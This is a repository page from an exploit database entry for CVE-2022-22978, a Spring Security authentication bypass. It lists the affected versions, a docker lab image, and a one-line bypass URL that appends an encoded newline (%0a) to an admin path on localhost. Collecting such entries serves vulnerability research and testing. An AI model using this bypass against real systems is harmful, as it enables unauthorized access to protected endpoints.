openkylin-exploit-db

History

Zhangqichen131 7891902029 删除文件 cve/java-spring-security/2022/CVE-2022-22978/pom.xml		2023-04-07 08:23:27 +00:00
..
POC_environment@6fe163bfad	add cve/java-spring-security/2022/CVE-2022-22978/POC_environment submodule.	2023-04-07 08:23:27 +00:00
README.md	添加 CVE-2022-22978	2023-04-07 08:23:27 +00:00
img.png	添加 CVE-2022-22978	2023-04-07 08:23:27 +00:00
img_1.png	添加 CVE-2022-22978	2023-04-07 08:23:27 +00:00

在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时，攻击者可以通过构造恶意数据包绕过身份认证

Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4

http://localhost:8080/admin/index%0a

docker pull s0cke3t/cve-2022-22978:latest